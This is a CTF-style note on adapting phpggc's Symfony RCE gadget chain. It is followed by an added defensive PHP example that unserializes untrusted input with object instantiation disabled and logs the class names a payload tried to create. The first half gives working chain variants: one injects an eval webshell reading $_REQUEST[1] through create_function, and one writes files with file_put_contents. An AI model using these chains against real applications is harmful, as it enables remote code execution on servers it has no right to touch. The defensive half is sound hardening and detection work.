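Symfony chains in phpggc
- By default, call_user_func is invoked with only one argument; passing multiple arguments as an array raises an error.
- To execute something more complex, consider injecting through create_function, modifying the source code as follows: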
```php
<?php
namespace GadgetChain\Symfony;

class RCE11 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '2.0.4 <= 5.4.24 (all)';
    public static $vector = '__destruct';
    public static $author = 'cfreal';

    public function generate(array $parameters)
    {
        $a = new \Symfony\Component\Validator\ConstraintViolationList([
            '$a',
            ';};@eval($_REQUEST[1]);var_dump(111111);#',
        ]);
        $b = new \Symfony\Component\Finder\Iterator\SortableIterator($a, 'create_function');
        $c = new \Symfony\Component\Validator\ConstraintViolationList($b);
        $d = new \Symfony\Component\Security\Core\Authentication\Token\AnonymousToken($c);
        return $d;
    }
}
```
In addition, on an expert's advice, the following code can be used to call a function with multiple arguments:
```php
<?php
namespace GadgetChain\Symfony;

class RCE11 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '2.0.4 <= 5.4.24 (all)';
    public static $vector = '__destruct';
    public static $author = 'cfreal';

    public function generate(array $parameters)
    {
        $a = new \Symfony\Component\Validator\ConstraintViolationList([
            '/tmp/11',
            '11',
        ]);
        $b = new \Symfony\Component\Finder\Iterator\SortableIterator($a, 'file_put_contents');
        $c = new \Symfony\Component\Validator\ConstraintViolationList($b);
        $d = new \Symfony\Component\Security\Core\Authentication\Token\AnonymousToken($c);
        return $d;
    }
}
```
If the challenge forbids writing files, it is hard to upload a webshell; in that case the first method works best.
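Both variants only fire if the application lets `unserialize()` instantiate the Symfony classes, so the defensive counterpart is to decode untrusted input with object instantiation disabled and reject anything that asked for a class. The following is an added example, not code from the original page or from phpggc; `safe_unserialize()`, `attempted_classes()` and `obj()` are hypothetical helpers, and it assumes PHP 7.0 or later and an application that never needs objects from untrusted serialized data.

```php
<?php
// Added example; safe_unserialize(), attempted_classes(), obj() are hypothetical helpers.
function attempted_classes($value, array &$found = []): array
{
    if ($value instanceof __PHP_Incomplete_Class) {
        // With allowed_classes => false every object decodes to this inert
        // stand-in, which records the class name the payload asked for.
        $props = (array) $value;
        $found[] = $props['__PHP_Incomplete_Class_Name'];
        unset($props['__PHP_Incomplete_Class_Name']);
        $value = $props;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            attempted_classes($item, $found);
        }
    }
    return $found;
}

function safe_unserialize(string $data)
{
    // No class is instantiated, so no __destruct or __wakeup of a gadget runs.
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== serialize(false)) {
        throw new UnexpectedValueException('malformed serialized data');
    }
    $classes = array_unique(attempted_classes($value));
    if ($classes !== []) {
        throw new UnexpectedValueException('objects rejected: ' . implode(', ', $classes));
    }
    return $value;
}
// Constructed sample: nests the class names from the chain above; the
// property name "x" is a placeholder, so this is not a working payload.
function obj(string $class, string $inner): string
{
    return sprintf('O:%d:"%s":1:{s:1:"x";%s}', strlen($class), $class, $inner);
}
$sample = obj('Symfony\Component\Security\Core\Authentication\Token\AnonymousToken',
    obj('Symfony\Component\Validator\ConstraintViolationList',
        obj('Symfony\Component\Finder\Iterator\SortableIterator', serialize('create_function'))));

var_dump(safe_unserialize(serialize(['id' => 7])));
try {
    safe_unserialize($sample);
} catch (UnexpectedValueException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

The exception message lists every class the input tried to instantiate, which makes it a useful log line for spotting deserialization probes.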